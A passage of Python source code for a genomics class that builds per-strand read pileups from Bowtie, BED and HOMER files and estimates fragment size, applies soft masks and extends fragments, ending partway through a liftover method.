self.spileups[chrom][strand] = numpy.multiply(self.spileups[chrom][strand], other)
return self
def __idiv__(self, other):
try:
assert self.build == other.build
self.name = '({}/{})'.format(self.name, other.name)
for chrom in self.spileups:
for strand in self.spileups[chrom]:
assert len(self.spileups[chrom][strand]) == len(other.spileups[chrom][strand])
self.spileups[chrom][strand] /= other.spileups[chrom][strand].astype(float)
self.is_normalized = self.is_normalized and other.is_normalized
except (AttributeError, ValueError):
self.name = '({}/{})'.format(self.name, other)
for chrom in self.spileups:
for strand in self.spileups[chrom]:
self.spileups[chrom][strand] = numpy.divide(self.spileups[chrom][strand], float(other))
return self
def __add__(self, other):
result = self.emptyCopy()
try:
assert self.build == other.build
result.name = '({}+{})'.format(self.name, other.name)
for chrom in self.spileups:
for strand in self.spileups[chrom]:
assert len(self.spileups[chrom][strand]) == len(other.spileups[chrom][strand])
result.spileups[chrom][strand] = self.spileups[chrom][strand] + other.spileups[chrom][strand]
result.is_normalized = self.is_normalized and other.is_normalized
except (AttributeError, ValueError):
for chrom in self.spileups:
for strand in self.spileups[chrom]:
result.spileups[chrom][strand] = numpy.add(self.spileups[chrom][strand], other)
result.name = '({}+{})'.format(self.name, other)
return result
def __sub__(self, other):
result = self.emptyCopy()
try:
assert self.build == other.build
result.name = '({}-{})'.format(self.name, other.name)
for chrom in self.spileups:
for strand in self.spileups[chrom]:
assert len(self.spileups[chrom][strand]) == len(other.spileups[chrom][strand])
result.spileups[chrom][strand] = self.spileups[chrom][strand] - other.spileups[chrom][strand]
result.is_normalized = self.is_normalized and other.is_normalized
except (AttributeError, ValueError):
for chrom in self.spileups:
for strand in self.spileups[chrom]:
result.spileups[chrom][strand] = numpy.subtract(self.spileups[chrom][strand], other)
result.name = '({}-{})'.format(self.name, other)
return result
def __mul__(self, other):
result = self.emptyCopy()
try:
assert self.build == other.build
result.name = '({}*{})'.format(self.name, other.name)
for chrom in self.spileups:
for strand in self.spileups[chrom]:
assert len(self.spileups[chrom][strand]) == len(other.spileups[chrom][strand])
result.spileups[chrom][strand] = self.spileups[chrom][strand] * other.spileups[chrom][strand]
result.is_normalized = self.is_normalized and other.is_normalized
except (AttributeError, ValueError):
for chrom in self.spileups:
for strand in self.spileups[chrom]:
result.spileups[chrom][strand] = numpy.multiply(self.spileups[chrom][strand], other)
result.name = '({}*{})'.format(self.name, other)
return result
def __div__(self, other):
result = self.emptyCopy()
try:
assert self.build == other.build
result.name = '({}/{})'.format(self.name, other.name)
for chrom in self.spileups:
if chrom not in result.spileups: # ToDo: extend this fix to other operations for StrandedPileup
result.spileups[chrom] = {}
for strand in self.spileups[chrom]:
assert len(self.spileups[chrom][strand]) == len(other.spileups[chrom][strand])
result.spileups[chrom][strand] = self.spileups[chrom][strand] / other.spileups[chrom][strand].astype(float)
result.is_normalized = self.is_normalized and other.is_normalized
except (AttributeError, ValueError):
# print ex
for chrom in self.spileups:
if chrom not in result.spileups: # ToDo: extend this fix to other operations for StrandedPileup
result.spileups[chrom] = {}
for strand in self.spileups[chrom]:
result.spileups[chrom][strand] = numpy.divide(self.spileups[chrom][strand], float(other))
result.name = '({}/{})'.format(self.name, other)
return result
def __pos__(self):
return self
def __neg__(self):
negated = StrandedPileups(self.chrom_lengths, build=self.build, name=self.name)
for chrom in self.spileups:
for strand in self.spileups[chrom]:
negated.spileups[chrom][strand] = -self.spileups[chrom][strand]
return negated
def __len__(self):
return self.genome_size
def __abs__(self):
result = StrandedPileups(self.chrom_lengths, build=self.build, name=self.name)
for chrom in self.spileups:
for strand in self.spileups[chrom]:
result.spileups[chrom][strand] = numpy.abs(self.spileups[chrom][strand])
return result
def __repr__(self):
result = 'Pileups object. Name: {}, Build: {}\n'.format(self.name, self.build)
result += 'Chromosome lengths:\n'
for chrom in self.chrom_lengths:
result += '\t{:>40}\t{:>11}\n'.format(chrom, self.chrom_lengths[chrom])
try:
result += 'Data type: {}\n'.format(list(self.spileups.values())[0][1].dtype)
except Exception:
pass
return result
def loadFromBowtie(self, bowtie_filename, ignore_strandless=False):
"""
Populate the pileup vector from a bowtie output file (.bwt)
Each strand will go into a separate vector
"""
start_time = datetime.datetime.now()
strand_translator = {'+': 1, '-': -1}
missing_chroms = set([])
self.read_length_counts = {}
self.input_filename = bowtie_filename
with open(bowtie_filename, 'rt') as bwt_file:
print(('Computing stranded pileup vectors from reads in {} ...'.format(bowtie_filename)))
for line_num, line in enumerate(bwt_file):
if line_num % REPORTING_INTERVAL == 0:
dbg_print('Reading line {}'.format(line_num), 1)
if len(line) > 0:
split_line = line.strip().split('\t')
strand = strand_translator[split_line[1]]
chrom = toolbox.convert_chroms(split_line[2], dest=self.chromosome_dialect)
if chrom in self.spileups:
self.read_counts[chrom] += 1
start_pos = int(split_line[3])
end_pos = start_pos + len(split_line[4])
read_length = end_pos - start_pos
if read_length not in self.read_length_counts:
    self.read_length_counts[read_length] = 0
self.read_length_counts[read_length] += 1
self.total_read_length += read_length
self.spileups[chrom][strand][start_pos:end_pos] += 1
else:
missing_chroms.add(chrom)
self.total_reads = sum(self.read_counts.values())
self.mode_read_length = max(list(self.read_length_counts.items()), key=lambda x: x[1])[0]
if self.total_reads > 0:
self.mean_read_length = self.total_read_length / float(self.total_reads)
else:
self.mean_read_length = 0
self.computeCoverage()
print(('\tMean coverage: {}'.format(self.coverage)))
if missing_chroms:
print((
'\tThe following chromosomes were found in the reads file but not in the defined chromosome structure: {}'.format(
', '.join(sorted(list(missing_chroms))))))
print(('Done in {}.'.format(datetime.datetime.now() - start_time)))
def loadFromBed(self, input_filename, region_handling=None, ignore_strandless=False,
display_read_lengths=True):
"""
Populate the pileup vector from a BED file (each genomic position will contain a count of the number of BED regions that overlap it)
Each strand will go into a separate vector
"""
start_time = datetime.datetime.now()
strand_translator = {'+': 1, '-': -1}
self.input_filename = input_filename
# print 'Chromosome dialect for bed file given as: {}'.format(reads_chromosome_dialect)
self.read_length_counts = collections.defaultdict(lambda: 0)
self.total_read_density = collections.defaultdict(lambda: 0)
missing_chroms = set([])
start_only = False
end_only = False
print(('Computing stranded pileup vectors from regions in {} ...'.format(input_filename)))
if region_handling == 'starts':
start_only = True
print('Using region starts only.')
elif region_handling == 'ends':
end_only = True
print('Using region end sites only.')
elif region_handling is not None:
raise ValueError('Received invalid value for parameter <region_handling>. Got {}'.format(region_handling))
with open(input_filename, 'rt') as tag_file:
for line_num, line in enumerate(tag_file):
if line_num % REPORTING_INTERVAL == 0:
dbg_print('Reading line {}'.format(line_num), 1)
split_line = line.strip().split('\t')
if len(line) > 0:
chrom = toolbox.convert_chroms(split_line[0], dest=self.chromosome_dialect)
# print split_line
if len(split_line) >= 6:
strand = strand_translator[split_line[5]]
else:
strand = 1
if not ignore_strandless:
raise Exception("\tRead with no strand found on line {}: {}".format(line_num, line))
if chrom in self.spileups:
self.read_counts[chrom] += 1
start_pos = int(split_line[1])
end_pos = int(split_line[2]) - 1
read_length = end_pos - start_pos + 1
self.total_read_density[chrom] += read_length
self.read_length_counts[read_length] += 1
assert start_pos >= 0
assert end_pos < self.chrom_lengths[chrom]
if (start_only and strand == 1) or (end_only and strand == -1):
self.spileups[chrom][strand][start_pos] += 1
# print 'read: {}, updating position {}'.format(line, start_pos)
elif (end_only and strand == 1) or (start_only and strand == -1):
self.spileups[chrom][strand][end_pos] += 1
# print 'read: {}, updating position {}'.format(line, end_pos)
else:
# end_pos is the last covered base (BED end - 1), so include it in the slice
self.spileups[chrom][strand][start_pos:end_pos + 1] += 1
else:
if chrom not in missing_chroms:
dbg_print('Chromosome {} not found in self!'.format(chrom), 1)
missing_chroms.add(chrom)
print('Done reading file.')
if missing_chroms:
print((
'\tThe following chromosomes were present in the bed file but not in the length dictionary: {}'.format(
', '.join(sorted(list(missing_chroms))))))
# print '\tChromosome lengths in self:'
# for chrom in toolbox.numerical_string_sort(self.chrom_lengths):
# print '\t\t{:<20}: {}'.format(chrom, self.chrom_lengths[chrom])
if display_read_lengths:
dbg_print('Read length counts:', 1)
for read_length in sorted(self.read_length_counts.keys()):
dbg_print('{}: {}'.format(read_length, self.read_length_counts[read_length]), 2)
self.mode_read_length = max(list(self.read_length_counts.items()), key=lambda x: x[1])[0]
dbg_print('{:<25} {:>10} {:>10}'.format('Chromosome', 'Reads', 'Coverage'), 1)
for chrom in toolbox.numerical_string_sort(self.read_counts):
dbg_print('{:<25} {:>10} {:>10}'.format(chrom, self.read_counts[chrom],
self.total_read_density[chrom] / float(
self.chrom_lengths[chrom])))
self.total_reads = sum(self.read_counts.values())
self.total_read_length = sum(self.total_read_density.values())
if self.total_reads > 0:
self.mean_read_length = self.total_read_length / float(self.total_reads)
else:
self.mean_read_length = 0
self.computeCoverage()
print(('\tMean coverage: {}'.format(self.coverage)))
print(('Done in {}.'.format(datetime.datetime.now() - start_time)))
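# Worked example for the BED loader above (coordinates are illustrative): a tab-separated line such as
#     chr1\t100\t150\tread_1\t0\t+
# adds 1 to every base of the region on the + strand pileup when no <region_handling> is given, or
# only to the region start (position 100) when region_handling='starts' (the region end for 'ends').
# For a '-' strand line the roles of start and end are swapped, so 'starts' always marks the 5' end.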
def load_from_homer_tag_directory(self, input_filename, region_handling=None,
display_read_lengths=True):
"""
Populate the pileup vectors from a HOMER tag directory (each genomic position will contain a count of the number of tags that overlap it)
Each strand will go into a separate vector.
"""
start_time = datetime.datetime.now()
strand_translator = {'0': 1, '1': -1}
self.input_filename = input_filename
self.read_length_counts = collections.defaultdict(lambda: 0)
self.total_read_density = collections.defaultdict(lambda: 0)
missing_chroms = set([])
start_only = False
end_only = False
print('Computing stranded pileup vectors from HOMER tag directory {} ...'.format(input_filename))
if region_handling == 'starts':
start_only = True
print('Using region starts only.')
elif region_handling == 'ends':
end_only = True
print('Using region end sites only.')
elif region_handling is not None:
raise ValueError('Received invalid value for parameter <region_handling>. Got {}'.format(region_handling))
for tag_file in sorted([f for f in os.listdir(input_filename) if f.endswith('.tags.tsv')]):
print('\tProcessing tag file {}'.format(tag_file))
with open(os.path.join(input_filename, tag_file), 'rt') as tag_file:
for line_num, line in enumerate(tag_file):
# if line_num % REPORTING_INTERVAL == 0:
# dbg_print('Reading line {}'.format(line_num), 1)
split_line = line.strip().split('\t')
if len(line) > 0:
chrom = toolbox.convert_chroms(split_line[0], dest=self.chromosome_dialect)
# print split_line
strand = strand_translator[split_line[2]]
if chrom in self.spileups:
read_length = int(split_line[4])
start_pos = int(split_line[1]) - 1
if strand == 1:
end_pos = start_pos + read_length
else:
end_pos = start_pos - read_length
num_reads = float(split_line[3])
assert 0 <= start_pos < self.chrom_lengths[
chrom], 'Read start position {} is out of bounds for chromosome {} with bounds [{},{}). Offending line: {}'.format(
start_pos, chrom, 0, self.chrom_lengths[chrom], line)
assert 0 <= end_pos < self.chrom_lengths[
chrom], 'Read end position {} is out of bounds for chromosome {} with bounds [{},{}), strand {} Offending line: {}'.format(
end_pos, chrom, 0, self.chrom_lengths[chrom], strand, line)
self.read_counts[chrom] += num_reads
self.total_read_density[chrom] += read_length * num_reads
self.read_length_counts[read_length] += num_reads
if (start_only and strand == 1) or (end_only and strand == -1):
self.spileups[chrom][strand][start_pos] += num_reads
# print 'read: {}, updating position {}'.format(line, start_pos)
elif (end_only and strand == 1) or (start_only and strand == -1):
self.spileups[chrom][strand][end_pos] += num_reads
# print 'read: {}, updating position {}'.format(line, end_pos)
else:
if strand == 1:
    self.spileups[chrom][strand][start_pos:end_pos] += num_reads
else:
    # for negative-strand tags end_pos < start_pos, so slice from end_pos up to the 5' end
    self.spileups[chrom][strand][end_pos + 1:start_pos + 1] += num_reads
else:
if chrom not in missing_chroms:
dbg_print('Chromosome {} not found in self!'.format(chrom), 1)
missing_chroms.add(chrom)
# print '\tDone.'
print('Done with tag directory')
if missing_chroms:
print('\tThe following chromosomes were present in the tag directory but not in the length dictionary: {}'.format(
', '.join(sorted(list(missing_chroms)))))
if display_read_lengths:
dbg_print('Read length counts:', 1)
for read_length in sorted(self.read_length_counts.keys()):
dbg_print('{}: {}'.format(read_length, self.read_length_counts[read_length]), 2)
self.mode_read_length = max(list(self.read_length_counts.items()), key=lambda x: x[1])[0]
dbg_print('{:<25} {:>10} {:>10}'.format('Chromosome', 'Reads', 'Coverage'), 1)
for chrom in toolbox.numerical_string_sort(self.read_counts):
dbg_print('{:<25} {:>10} {:>10}'.format(chrom, self.read_counts[chrom],
self.total_read_density[chrom] / float(
self.chrom_lengths[chrom])))
self.total_reads = sum(self.read_counts.values())
self.total_read_length = sum(self.total_read_density.values())
if self.total_reads > 0:
self.mean_read_length = self.total_read_length / float(self.total_reads)
else:
self.mean_read_length = 0
self.computeCoverage()
print('\tMean coverage: {}'.format(self.coverage))
print('Done in {}.'.format(datetime.datetime.now() - start_time))
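# Worked example for the HOMER tag loader above, as parsed by this method (values are illustrative):
# a *.tags.tsv line of the form
#     chr1\t1001\t0\t2.0\t36
# means 2.0 (possibly fractional) + strand tags of length 36 whose 5' end is at 1-based position 1001;
# the loader converts this to 0-based start_pos = 1000 and, with region_handling='starts', adds 2.0
# to position 1000 of the + strand pileup.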
# def computeBindingEnergy(self, fasta_filename, jaspar_filename):
# """
# Computes a binding energy profile for the motif defined by <jaspar_filename> interacting with the genomic
# sequence given in <fasta_filename> for each strand (negative strand uses reverse complement sequence). The
# binding energy for each subsequence is
# :param fasta_filename:
# :param jaspar_filename:
# :return:
# """
# start_time = datetime.datetime.now()
# print 'Computing binding energy vectors for \'{}\' using motif file {} and reference sequence {}.'.format(
# self.name, jaspar_filename, fasta_filename)
#
# with open(fasta_filename, 'rt') as fasta_file:
# sequence_dict = toolbox.parse_fasta_dict(fasta_file.read())
#
# # make sure the sequence file matches our vectors
# for chrom in self.chrom_lengths:
# assert chrom in sequence_dict
# assert len(sequence_dict[chrom]) == self.chrom_lengths[chrom]
# # print chrom, len(sequence_dict[chrom]), self.chrom_lengths[chrom]
#
# # compute global background dist:
# print '\tComputing background distribution of nucleotides...'
# background_freqs = {}
# for chrom in self.chrom_lengths:
# background_freqs = toolbox.dict_add(background_freqs, toolbox.freq(sequence_dict[chrom]))
# total_nucleotides = sum(background_freqs.values())
# background_model = numpy.zeros(4)
# for i, nuc in enumerate(('A', 'C', 'G', 'T')):
# background_model[i] = background_freqs[nuc] / float(total_nucleotides)
# print '\tA: {:>.2} C: {:>.2} G: {:>.2} T: {:>.2}'.format(*list(background_model))
#
# print '\tGenerating background-aware log PWM...'
# pfm = motifs.load_PFM_horizontal(jaspar_filename)
# pwm = motifs.pfm_to_pwm_log(pfm, background_model=background_model, pseudo_count=0.01)
# score_offset = int(pwm.shape[1] / 2) # find the midpoint position of the motif
#
# print '\tScanning genome with PWM ...'
# for chrom in sorted(self.spileups):
# _print('Chrom: {}'.format(chrom), 2)
# for strand in self.spileups[chrom]:
# _print('Strand: {}'.format(strand), 3)
# if strand == 1:
# self.spileups[chrom][strand] = motifs.scan_pwm(seq=sequence_dict[chrom], pwm=pwm,
# score_offset=score_offset)
# else:
# self.spileups[chrom][strand] = motifs.scan_pwm(seq=toolbox.rev_complement(sequence_dict[chrom]),
# pwm=pwm, score_offset=score_offset)[::-1]
# print 'Done in {}'.format(datetime.datetime.now() - start_time)
#
def computeCoverage(self):
self.coverage = self.total_read_length / float(self.genome_size)
def getFragmentSize(self, replicate_name, fragment_size_search_start=100, fragment_size_search_end=1000,
save_plot_fname='', derivative_smoothing_factor=10):
fragment_length = get_fragment_size_from_file(replicate_name)
if not fragment_length:
fragment_length = self.estimateFragmentSize(fragment_size_search_start, fragment_size_search_end,
save_plot_fname=save_plot_fname,
derivative_smoothing_factor=derivative_smoothing_factor,
force_split=self.build in ('monDom5',))
save_fragment_length(replicate_name, fragment_length)
self.fragment_size = fragment_length
return fragment_length
def estimateFragmentSize(self, fragment_size_search_start=50, fragment_size_search_end=500, save_plot_fname='',
derivative_smoothing_factor=10, mem_map_inputs=False,
force_split=False):
"""
Computes the optimal distance to shift each strand toward each other in order to maximize the cross-correlation
of the two strands.
:param fragment_size_search_start:
:param fragment_size_search_end:
:param save_plot_fname:
:return:
"""
start_time = datetime.datetime.now()
multi_processing_method = MULTI_PROCESSING_METHOD
print('Estimating fragment size by cross-correlation of positive and negative strands...')
total_cc = numpy.zeros(fragment_size_search_end - fragment_size_search_start)
total_cc_counter = numpy.zeros(len(
total_cc)) # track the number of contributing chromosomes at each position in the vector so later we can take the mean
print('Generating list of chromosomes to process...')
param_list = []
for chrom in sorted(list(self.spileups.keys()), key=lambda x: len(self.spileups[x][-1]), reverse=True):
# divide each chromosome into roughly-evenly-sized chunks as needed to get around the maximum parameter
# size limitation of the multiprocessing module.
num_chunks_needed = int(math.ceil(len(self.spileups[chrom][1]) / float(MAX_MESSAGE_SIZE / 2)))
if multi_processing_method == 'pool' or multi_processing_method == 'hybrid' or force_split:
dbg_print(
'\tSplitting chromosome {} of size {} into {} chunks...'.format(chrom, len(self.spileups[chrom][1]),
num_chunks_needed))
else:
dbg_print('\tPreparing chromosome {} of size {}...'.format(chrom, len(self.spileups[chrom][1])))
# Note that if the fftconvolve method is later called with mode='same', it is the second argument whose sequence
# should be reversed otherwise the size and midpoint calculations are thrown off.
if (
multi_processing_method == 'pool' or multi_processing_method == 'hybrid' or force_split) and num_chunks_needed > 1:
neg_strand_chunks = toolbox.flexible_split(self.spileups[chrom][-1],
num_chunks_needed)
pos_strand_chunks = toolbox.flexible_split(self.spileups[chrom][1],
num_chunks_needed)
else:
neg_strand_chunks = [self.spileups[chrom][-1]]
pos_strand_chunks = [self.spileups[chrom][1]]
mem_mapped_file_counter = 0
for chunk_idx in range(len(neg_strand_chunks)):
if mem_map_inputs and mem_mapped_file_counter < MAX_FILEHANDLES_PER_PILEUP:
neg_chunk = toolbox.replace_with_mem_map(neg_strand_chunks[chunk_idx], tmp_dir=LOCAL_TMP_DIR)
pos_chunk = toolbox.replace_with_mem_map(pos_strand_chunks[chunk_idx], tmp_dir=LOCAL_TMP_DIR)
mem_mapped_file_counter += 2
else:
neg_chunk = neg_strand_chunks[chunk_idx]
pos_chunk = pos_strand_chunks[chunk_idx]
param_list.append((chrom, chunk_idx, (neg_chunk, pos_chunk)))
del neg_chunk
del pos_chunk
del neg_strand_chunks
del pos_strand_chunks
dbg_print('Sorting chunks in descending order of size...')
param_list.sort(key=lambda x: len(x[2][-1]), reverse=True)
if multi_processing_method == 'antfarm':
print(('Spawning up to {} sub-processes (using AntFarm) to process {} chromosomes in {} chunks'.format(
THREADS,
len(self.spileups),
len(param_list))))
# convert parameter list to job dictionary to feed to AntFarm
job_dict = collections.OrderedDict()
for paramset in param_list:
job_dict['{}_{}'.format(paramset[0], paramset[1])] = {'inputs': (paramset[2][0], paramset[2][1]),
'num_outputs': 1,
'params': (paramset[0], paramset[1])}
del param_list
cross_correlate_farm = antfarm.AntFarm(slave_script=toolbox.home_path(
'workspace/expression_modeling/model/pileup_cross_correlate_chromslave.py'),
base_path=LOCAL_TMP_DIR,
job_dict=job_dict, max_threads=THREADS, debug=False)
results = cross_correlate_farm.execute()
del job_dict
# print 'results:{}'.format(results)
for job_name in results:
cc = results[job_name][0]
# print '\t{} {}'.format(job_name, len(cc))
midpoint = len(cc) // 2  # integer division so this can be used as a slice index under Python 3
cc_end = min(midpoint + (fragment_size_search_end - fragment_size_search_start), len(cc))
total_cc_end = cc_end - midpoint
# print 'midpoint {}, cc_end {}, total_cc_end {}'.format(midpoint, cc_end, total_cc_end)
# print 'len cc {} len total_cc {}'.format(len(cc), len(total_cc))
total_cc[:total_cc_end] += cc[midpoint:cc_end]
total_cc_counter[:total_cc_end] += 1
elif multi_processing_method == 'pool' or multi_processing_method == 'hybrid' or multi_processing_method == 'none':
if multi_processing_method == 'pool':
print((
'Spawning up to {} sub-processes (using multiprocessing.Pool) to cross-correlate {} chromosomes in {} chunks'.format(
THREADS,
len(self.spileups),
len(param_list))))
with contextlib.closing(multiprocessing.Pool(THREADS)) as p:
results = p.imap(cross_correlate_chromslave, param_list)
elif multi_processing_method == 'none':
print(('Processing {} chromosomes in {} chunks with a single process...'.format(len(self.spileups),
len(param_list))))
results = list(map(cross_correlate_chromslave, param_list))
del param_list
for chrom, chunk_idx, cc in results:
midpoint = len(cc) // 2  # integer division so this can be used as a slice index under Python 3
cc_end = min(midpoint + (fragment_size_search_end - fragment_size_search_start), len(cc))
total_cc_end = cc_end - midpoint
total_cc[:total_cc_end] += cc[midpoint:cc_end]
total_cc_counter[:total_cc_end] += 1
else:
raise ValueError(
'Received invalid value {} for parameter <multi_processing_method> in StrandedPileups.estimateFragmentSize()'.format(
multi_processing_method))
# remove zero positions and take the mean of all contributions to each locus
total_cc_nz = numpy.nonzero(total_cc_counter)
total_cc = total_cc[total_cc_nz] / total_cc_counter[total_cc_nz]
print(('Looking for cross-correlation peaks from {} to {} bp'.format(fragment_size_search_start,
fragment_size_search_end)))
print('\tCalculating first derivative by finite difference...')
der1 = toolbox.finite_difference(total_cc)
print('\tSmoothing derivative...')
smoothed_der1 = scipy.ndimage.gaussian_filter1d(der1, derivative_smoothing_factor)
print('\tFinding downward 0-crossings...')
crossings = [c + fragment_size_search_start + 1 for c in
toolbox.find_0_crossings(smoothed_der1, 1, rising_falling='falling')]
print(('\tCandidate fragment lengths: {}'.format(', '.join([str(c) for c in crossings]))))
fragment_size = crossings[0]
# full_shift = crossings[0] + strand_shift_window_start
# full_shift = numpy.argmax(total_cc) + strand_shift_window_start
half_shift = int(fragment_size / 2)
print(('Estimated fragment size: {}, strand shift: {}'.format(fragment_size, half_shift)))
if save_plot_fname:
print(('Saving cross-correlation plot as {}'.format(save_plot_fname)))
# print '\tshape of cross-correlation vector: {}'.format(total_cc.shape)
myplots.plot_cc(start=fragment_size_search_start,
signal=total_cc[:min(fragment_size_search_end, len(total_cc))], peak_locations=crossings,
fname=save_plot_fname)
print(('Done in {}'.format(datetime.datetime.now() - start_time)))
return fragment_size
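# The peak-picking step above smooths the first derivative of the cross-correlation and takes its
# first falling zero-crossing as the fragment size. A rough numpy-only equivalent of that idea
# (toolbox.find_0_crossings itself is not shown in this file) would be:
#     der = numpy.diff(total_cc)
#     smoothed = scipy.ndimage.gaussian_filter1d(der, derivative_smoothing_factor)
#     falling = numpy.where((smoothed[:-1] > 0) & (smoothed[1:] <= 0))[0] + 1
#     fragment_size = falling[0] + fragment_size_search_start + 1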
def readStartsToSoftMask(self, read_length, fragment_length):
"""
Assuming this object contains read start sites, return a soft mask whereby each strand consists of
the proportion of putative fragment starts (within <fragment_length> upstream) that are alignable.
Note: this flavor of soft masking is designed for the fragment extension method. Soft masking with read shifting
is currently not supported.
Since this object is assumed to contain only the start sites of positive-strand fragments, we will need to shift
everything over by <read_length> in order to simulate the ends of negative-strand fragments.
<multi_processing_method> defines which approach to multi-processing to use:
"antfarm": use the AntFarm paradigm
"pool": use multiprocessing.Pool
"none": only use a single process -- no multi-processing
"""
start_time = datetime.datetime.now()
multi_processing_method = MULTI_PROCESSING_METHOD
new_pileups = self.emptyCopy()
new_pileups.name = self.name + '_extended_to_{}_bp'.format(fragment_length)
print((
'Generating double-stranded soft mask from vector of positive-strand read start sites using fragment length {} and read length {}...'.format(
fragment_length, read_length)))
param_list = [(chrom, self.spileups[chrom][1], read_length, fragment_length) for chrom in
sorted(list(self.spileups.keys()), key=lambda x: self.chrom_lengths[x],
reverse=True)] # process largest chromosomes first
if multi_processing_method == 'hybrid':
# convert parameter list to job dictionary to feed to AntFarm
job_dict = collections.OrderedDict()
new_param_list = []
for paramset in param_list:
if len(paramset[1]) > MAX_MESSAGE_SIZE:
job_dict[paramset[0]] = {'inputs': [paramset[1]], 'num_outputs': 2,
'params': [paramset[2], paramset[3]]}
else:
new_param_list.append(paramset)
param_list = new_param_list
elif multi_processing_method == 'antfarm':
# convert parameter list to job dictionary to feed to AntFarm
job_dict = collections.OrderedDict()
for paramset in param_list:
job_dict[paramset[0]] = {'inputs': [paramset[1]], 'num_outputs': 2,
'params': [paramset[2], paramset[3]]}
if multi_processing_method == 'antfarm' or multi_processing_method == 'hybrid':
print('Spawning up to {} subprocesses (using AntFarm) to soft mask {} chromosomes...'.format(THREADS, len(
job_dict)))
soft_mask_farm = antfarm.AntFarm(
slave_script=toolbox.home_path('workspace/expression_modeling/model/pileup_soft_mask_chromslave.py'),
base_path=LOCAL_TMP_DIR,
job_dict=job_dict, max_threads=THREADS, debug=False)
results = soft_mask_farm.execute()
for chrom in results:
new_pileups.spileups[chrom] = {-1: results[chrom][0].astype(self.pileup_dtype),
1: results[chrom][1].astype(self.pileup_dtype)}
if multi_processing_method == 'pool' or multi_processing_method == 'none' or multi_processing_method == 'hybrid':
if multi_processing_method == 'pool' or multi_processing_method == 'hybrid':
print(
('Spawning up to {} subprocesses (using multiprocessing.Pool) to process {} chromosomes...'.format(
THREADS, len(param_list))))
with contextlib.closing(multiprocessing.Pool(THREADS)) as p:
results = p.imap(soft_mask_generate_chromslave, param_list)
elif multi_processing_method == 'none':
print(('Processing {} chromosomes with a single process...'.format(len(self.spileups))))
results = list(map(soft_mask_generate_chromslave, param_list))
for chrom, soft_mask in results:
new_pileups.spileups[chrom] = {-1: soft_mask[0], 1: soft_mask[1]}
print('Done converting read starts to soft mask in {}'.format(datetime.datetime.now() - start_time))
return new_pileups
def applySoftMask(self, soft_mask):
"""
Just divides the contents by the values in <soft_mask>, ignoring positions with a 0 value in <soft_mask>
"""
start_time = datetime.datetime.now()
print(('Applying soft mask {} to {}'.format(soft_mask.name, self.name)))
for chrom in sorted(self.spileups, key=lambda x: self.chrom_lengths[x], reverse=True):
dbg_print('Processing chromosome {}...'.format(chrom), 1)
for strand in self.spileups[chrom]:
if numpy.abs(self.spileups[chrom][strand]).sum() > 0:
maskable_strand = numpy.ma.array(
self.spileups[chrom][strand].astype(numpy.float64)) # prevent divide by 0 (divide by 0 -> 0)
maskable_strand /= soft_mask.spileups[chrom][strand].astype(numpy.float64)
self.spileups[chrom][strand] = maskable_strand.filled(0).astype(self.pileup_dtype)
else:
dbg_print('\tChromosome {}, strand {} was empty so not processed.'.format(chrom, strand))
print(('Done in {}'.format(datetime.datetime.now() - start_time)))
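# The masked-array trick above makes division by a zero soft-mask value yield 0 instead of inf/NaN.
# A minimal illustration of that behaviour:
#     a = numpy.ma.array([2.0, 4.0, 6.0])
#     a /= numpy.array([1.0, 0.0, 2.0])
#     a.filled(0)   # -> array([2., 0., 3.]); the divide-by-zero entry is masked, then zero-filled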
def fragExtend(self, fragment_length):
"""
Assuming contents represent counts of read start sites, extend each start site into a fragment of <fragment_length> bp on each strand (each start contributes coverage to the fragment_length - 1 positions downstream in the 3' direction).
:param fragment_length:
:return:
"""
multi_processing_method = MULTI_PROCESSING_METHOD
new_pileups = self.emptyCopy()
new_pileups.name = '{}_extended_to_{}bp'.format(self.name, fragment_length)
start_time = datetime.datetime.now()
print(('Extending read start sites in {} by {} bp...'.format(self.name, fragment_length - 1)))
param_list = [(chrom, (self.spileups[chrom][-1], self.spileups[chrom][1]), fragment_length) for chrom in
# note extension is fragment size -1 since we already have the start site
sorted(list(self.spileups.keys()), key=lambda x: self.chrom_lengths[x], reverse=True)]
if multi_processing_method == 'hybrid':
# convert parameter list to job dictionary to feed to AntFarm consisting only of chromosomes too large
# to use in Pool
job_dict = collections.OrderedDict()
new_param_list = []
for paramset in param_list:
if len(paramset[1][0]) > MAX_MESSAGE_SIZE:
job_dict[paramset[0]] = {'inputs': [paramset[1][0], paramset[1][1]], 'num_outputs': 2,
'params': [paramset[2]]}
else:
new_param_list.append(paramset)
param_list = new_param_list
elif multi_processing_method == 'antfarm':
# convert parameter list to job dictionary to feed to AntFarm
job_dict = collections.OrderedDict()
for paramset in param_list:
job_dict[paramset[0]] = {'inputs': [paramset[1][0], paramset[1][1]], 'num_outputs': 2,
'params': [paramset[2]]}
del param_list
if multi_processing_method == 'antfarm' or multi_processing_method == 'hybrid':
print(('Spawning up to {} subprocesses (using AntFarm) to process {} chromosomes...'.format(THREADS, len(
job_dict))))
frag_extend_farm = antfarm.AntFarm(
slave_script=toolbox.home_path('workspace/expression_modeling/model/pileup_frag_extend_chromslave.py'),
base_path=LOCAL_TMP_DIR,
job_dict=job_dict, max_threads=THREADS, debug=False)
results = frag_extend_farm.execute()
del job_dict
for chrom in results:
new_pileups.spileups[chrom] = {-1: results[chrom][0].astype(self.pileup_dtype),
1: results[chrom][1].astype(self.pileup_dtype)}
if multi_processing_method == 'pool' or multi_processing_method == 'none' or multi_processing_method == 'hybrid':
if multi_processing_method == 'pool' or multi_processing_method == 'hybrid':
print(
('Spawning up to {} subprocesses (using multiprocessing.Pool) to process {} chromosomes...'.format(
THREADS, len(param_list))))
with contextlib.closing(multiprocessing.Pool(THREADS)) as p:
results = p.imap(frag_extend_chromslave, param_list)
elif multi_processing_method == 'none':
print(('Processing {} chromosomes with a single process...'.format(len(self.spileups))))
results = list(map(frag_extend_chromslave, param_list))
for chrom, extended_fragments in results:
new_pileups.spileups[chrom] = {-1: extended_fragments[0], 1: extended_fragments[1]}
# else:
# raise ValueError(
# 'Received invalid value {} for parameter <multi_processing_method> in StrandedPileups.fragExtend()'.format(
# multi_processing_method))
print(('All done in {}.'.format(datetime.datetime.now() - start_time)))
return new_pileups
def liftoverWithChain(self, source_pileups, chain_basepath, chain_type='normal', destination_dtype=None):
"""
Uses <chain_file> to liftover the contents of <source_pileups> to itself.
Chain files are named <Reference>To<Query>
"""
start_time = datetime.datetime.now()
if not destination_dtype:
destination_dtype = self.pileup_dtype
header_fields = (
'dummy', 'score', 'tName', 'tSize', 'tStrand', 'tStart', 'tEnd', 'qName', 'qSize', 'qStrand', 'qStart',
'qEnd',
'id')
# generate chain filename
